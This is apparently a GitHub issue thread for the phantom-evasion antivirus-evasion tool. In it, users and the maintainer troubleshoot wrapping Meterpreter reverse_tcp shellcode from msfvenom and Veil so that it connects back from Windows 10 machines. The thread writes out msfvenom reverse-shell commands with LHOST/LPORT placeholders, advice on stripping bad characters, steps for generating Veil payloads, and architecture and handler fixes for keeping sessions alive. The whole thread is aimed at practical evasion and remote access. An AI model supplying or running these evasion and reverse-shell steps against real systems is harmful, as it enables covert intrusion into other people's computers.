Comments (35)
Of course
from phantom-evasion.
@oddcod3 Works! The wrong badchars were the problem. Thanks for the help!
from phantom-evasion.
64 bit payloads are more efficient (1/66) as mentioned in the README.
For example use windows/x64/meterpreter/reverse_tcp as msfvenom payload with one of the Windows shellcode injection modules.
from phantom-evasion.
Only problem is that I couldn't get shellcode injection to work even on 32bit.
I generated win shellcode with
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f c > outfile
which gave me a file like
#some notes
"\xfc\x8d\....\k6s"
"\j2c\x20\...\x00";
and I merged all together and pasted all in one line like \xfc\x8d\k6s\j2c\x20\x00
Was that correct or is there my mistake?
from phantom-evasion.
Your shellcode contains badchars (like \x00 (string terminator in C), \x0a and \x0d).
To avoid the problem add to your msfvenom command: -b "/x00/x0a/x0b"
Or use directly the option msfvenom payload in phantom evasion, which automatically removes badchars from shellcode.
from phantom-evasion.
As described in this issue, I can't use the option msfvenom payload in phantom evasion, because you can't add other options besides lhost/lport
like PrependMigrate
but I will try the shellcode method again
from phantom-evasion.
I have no luck.
No shellcode worked, the default meterpreter only worked partly.
The default meterpreter sends the initializer stage, but exits afterwards
from phantom-evasion.
Did you set payload option in multi/handler correctly?
If you use a 64 bit payload the listener must be aware of what kind of stages it will have to send once a connection has been established (x86 or x64 meterpreter stages).
from phantom-evasion.
It looks like you've used windows/x64/meterpreter/reverse_tcp as payload but on multi/handler you've set payload windows/meterpreter/reverse_tcp.
from phantom-evasion.
No I've used the 32bit payload on both listener and sender.
The only time I ran into this same error was when I was testing the reverse_http payload with proxy, but besides that it either worked or didn't work at all.
But I think with a lot of testing I can figure this one out myself
My main problem is a different one. It's how to use Metasploit as shellcode. When created and implemented like in my comments above, even with AV turned off, it just doesn't create the connection.
Has anyone even tested it with own shellcode from msfvenom?
from phantom-evasion.
Could you paste here your msfvenom command used to generate the shellcode?
(Without lhost and lport information)
from phantom-evasion.
Already posted it above but here again:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0b" > outfile
from phantom-evasion.
@anonymouz4 same problem
from phantom-evasion.
Any updates on this?
from phantom-evasion.
@oddcod3 I used custom shellcode generated by veil and couldn't get any session back to meterpreter. Could you please check it?
from phantom-evasion.
@anonymouz4 I've made a mistake: not /x0b but /x0d
from phantom-evasion.
@oddcod3 I didn't use badchars while generating shellcode with veil. The badchars that I avoided were \x00\x0a\x0d
from phantom-evasion.
@oddcod3 Ok I will try this with /x0d and then get back to you
from phantom-evasion.
I'm testing now if I can reproduce the issue.
At the moment I've tested custom msfvenom x86 shellcode with compiling option x86 and I can establish a session without problem.
Are you all (@usama7628674 @anonymouz4 @onesentinel) aware that using an x86 shellcode requires compiling the executable for the x86 architecture?
from phantom-evasion.
@oddcod3 Here's how you can reproduce the issue:
clone and install veil from github
use ordnance
select payload rev_tcp
set badchars \x00\x0a\x0d
set other options lhost,lport
generate
Then copy and paste the shellcode in phantom-evasion
select architecture x64.
run the generated .exe in windows 10 v1803
from phantom-evasion.
@usama7628674 Are you sure payload rev_tcp
isn't 32bit?
from phantom-evasion.
@anonymouz4 That's what I don't know. I'll ask the veil developer.
from phantom-evasion.
@usama7628674 I'm almost sure that that is the case here. Just use msfvenom to create the shell code
from phantom-evasion.
@anonymouz4 Maybe veil is generating 32 bit shellcode while I'm using x64 arch in phantom-evasion will try x86 arch and see if it works or not
from phantom-evasion.
Yes, as @anonymouz4 said, veil payloads are 32 bit. @usama7628674 with the x86 compiling option you'll see a session correctly established!
from phantom-evasion.
@anonymouz4 finally!! (I'm sorry for the typo!)
from phantom-evasion.
@oddcod3 Yeah I'm pretty sure now veil generates 32 bit shellcode
from phantom-evasion.
@oddcod3
I think I celebrated a little too early. It creates the connection but instantly dies
And this time I'm 100% sure everything is on 32bit
from phantom-evasion.
@anonymouz4 try with veil and see if you sustain the connection permanently.
from phantom-evasion.
@usama7628674 Maybe, but I'll need to invest a lot of time bc Veil isn't working yet for me. Every time I run the script it just says installing and finishes that with success. So I probably have to do it all manually.
from phantom-evasion.
@anonymouz4 You must install it using git clone method
from phantom-evasion.
@usama7628674 I did
from phantom-evasion.
@anonymouz4 What did you get after executing?
from phantom-evasion.
Has anyone achieved a working connection with 64bit
shellcode?
My summary:
Veil:
Only supports 32bit shellcode (not tested, but prob. works)
msfvenom:
32bit connects but instantly dies. 64bit doesn't work at all
from phantom-evasion.
I will open a new issue and close this one to create an overview on this topic, bc everything here is a little unclear.
Just like a fresh start.
from phantom-evasion.